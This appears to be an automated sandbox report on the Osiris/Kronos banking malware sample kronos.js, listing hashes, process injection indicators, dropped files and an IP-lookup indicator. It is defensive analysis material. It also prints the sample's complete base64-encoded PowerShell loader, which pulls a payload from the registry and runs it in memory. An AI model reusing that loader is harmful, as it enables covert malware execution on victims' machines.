osiris | a0081f88e43338810fe23bd2e1fba8857b45f4378df38fc0c217426468b924fc

General

Target

kronos.js
Size

2.5MB
MD5

bd52c3fcb98700992066743b021876dd
SHA1

c711676cf2dadffa73b3bd03de01fc3e6ea4e892
SHA256

a0081f88e43338810fe23bd2e1fba8857b45f4378df38fc0c217426468b924fc
SHA512

24b6831f75736ba70ba8fd00263391e220c7e7cbf3c0d9ed1bfb24f92384a4694282509864d139950afaa910a2c278371354e61a51348b652419bd9c405d7e3b

Score

10^/10

osiris banker botnet

Malware Config

Signatures

Osiris
banker botnet osiris
Executes dropped EXE 1 IoCs

Processes:

GetX64BTIT.exe

pid process

1712 GetX64BTIT.exe
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

23 api.ipify.org
24 api.ipify.org
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 420 set thread context of 1372 420 powershell.exe ImagingDevices.exe

pid	process
1712	GetX64BTIT.exe

flow	ioc
23	api.ipify.org
24	api.ipify.org

description	pid	process	target process
PID 420 set thread context of 1372	420	powershell.exe	ImagingDevices.exe

Suspicious behavior: EnumeratesProcesses 7045 IoCs

Processes:

powershell.exeImagingDevices.exe

pid	process
420	powershell.exe
420	powershell.exe
420	powershell.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe
1372	ImagingDevices.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 420 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

ImagingDevices.exe

pid process

1372 ImagingDevices.exe

description	pid	process
Token: SeDebugPrivilege	420	powershell.exe

pid	process
1372	ImagingDevices.exe

Suspicious use of WriteProcessMemory 17 IoCs

Processes:

wscript.execmd.exepowershell.exeImagingDevices.exe

description	pid	process	target process
PID 4768 wrote to memory of 3096	4768	wscript.exe	cmd.exe
PID 4768 wrote to memory of 3096	4768	wscript.exe	cmd.exe
PID 3096 wrote to memory of 420	3096	cmd.exe	powershell.exe
PID 3096 wrote to memory of 420	3096	cmd.exe	powershell.exe
PID 3096 wrote to memory of 420	3096	cmd.exe	powershell.exe
PID 420 wrote to memory of 1372	420	powershell.exe	ImagingDevices.exe
PID 420 wrote to memory of 1372	420	powershell.exe	ImagingDevices.exe
PID 420 wrote to memory of 1372	420	powershell.exe	ImagingDevices.exe
PID 420 wrote to memory of 1372	420	powershell.exe	ImagingDevices.exe
PID 420 wrote to memory of 1372	420	powershell.exe	ImagingDevices.exe
PID 420 wrote to memory of 1372	420	powershell.exe	ImagingDevices.exe
PID 420 wrote to memory of 1372	420	powershell.exe	ImagingDevices.exe
PID 420 wrote to memory of 1372	420	powershell.exe	ImagingDevices.exe
PID 420 wrote to memory of 1372	420	powershell.exe	ImagingDevices.exe
PID 420 wrote to memory of 1372	420	powershell.exe	ImagingDevices.exe
PID 1372 wrote to memory of 1712	1372	ImagingDevices.exe	GetX64BTIT.exe
PID 1372 wrote to memory of 1712	1372	ImagingDevices.exe	GetX64BTIT.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\kronos.js
1⤵
- Suspicious use of WriteProcessMemory
PID:4768

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAbwBmAHEAZgBzAGcAZAAgACMAPgAkAHUAPQAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgADcAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "
2⤵
- Suspicious use of WriteProcessMemory
PID:3096

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAbwBmAHEAZgBzAGcAZAAgACMAPgAkAHUAPQAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgADcAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:420

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1372

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"
5⤵
- Executes dropped EXE
PID:1712

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
MD5
b4cd27f2b37665f51eb9fe685ec1d373

SHA1
7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0

SHA256
91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581

SHA512
e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
MD5
b4cd27f2b37665f51eb9fe685ec1d373

SHA1
7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0

SHA256
91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581

SHA512
e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\x64btit.txt
MD5
4a11ecb43bd4b008ea4a7a83f56e95f1

SHA1
46cf7b68094b419d23eacc08e5ab4d0bf3922826

SHA256
f89abb8a4b9978969295f7729bc1027e8d36e3115f896c6d8f318ab60f86413e

SHA512
1c3e01df02e9aa2a60e28fe8ea14f41ad2838e400dd0a4e384336f85bc789615fc61a0ffd32700dc99e1502c1951c4d742ee1a7a0571ca25e3966e332edd701e

Download Submit
memory/420-15-0x0000000009600000-0x0000000009601000-memory.dmp

Filesize
4KB

Download
memory/420-17-0x0000000009390000-0x0000000009391000-memory.dmp

Filesize
4KB

Download
memory/420-8-0x0000000007450000-0x0000000007451000-memory.dmp

Filesize
4KB

Download
memory/420-9-0x00000000075F0000-0x00000000075F1000-memory.dmp

Filesize
4KB

Download
memory/420-10-0x0000000007660000-0x0000000007661000-memory.dmp

Filesize
4KB

Download
memory/420-11-0x0000000007F10000-0x0000000007F11000-memory.dmp

Filesize
4KB

Download
memory/420-12-0x00000000082E0000-0x00000000082E1000-memory.dmp

Filesize
4KB

Download
memory/420-13-0x00000000086E0000-0x00000000086E1000-memory.dmp

Filesize
4KB

Download
memory/420-14-0x00000000085E0000-0x00000000085E1000-memory.dmp

Filesize
4KB

Download
memory/420-4-0x0000000000000000-mapping.dmp

Download
memory/420-16-0x0000000009340000-0x0000000009341000-memory.dmp

Filesize
4KB

Download
memory/420-7-0x00000000077E0000-0x00000000077E1000-memory.dmp

Filesize
4KB

Download
memory/420-18-0x0000000009BA0000-0x0000000009BA1000-memory.dmp

Filesize
4KB

Download
memory/420-19-0x00000000096E0000-0x00000000096E2000-memory.dmp

Filesize
8KB

Download
memory/420-20-0x0000000009860000-0x00000000099AC000-memory.dmp

Filesize
1.3MB

Download
memory/420-5-0x00000000733E0000-0x0000000073ACE000-memory.dmp

Filesize
6.9MB

Download
memory/420-6-0x0000000004E40000-0x0000000004E41000-memory.dmp

Filesize
4KB

Download
memory/1372-23-0x0000000000400000-0x0000000000456000-memory.dmp

Filesize
344KB

Download
memory/1372-22-0x0000000000401698-mapping.dmp

Download
memory/1372-21-0x0000000000400000-0x0000000000456000-memory.dmp

Filesize
344KB

Download
memory/1712-24-0x0000000000000000-mapping.dmp

Download
memory/3096-3-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing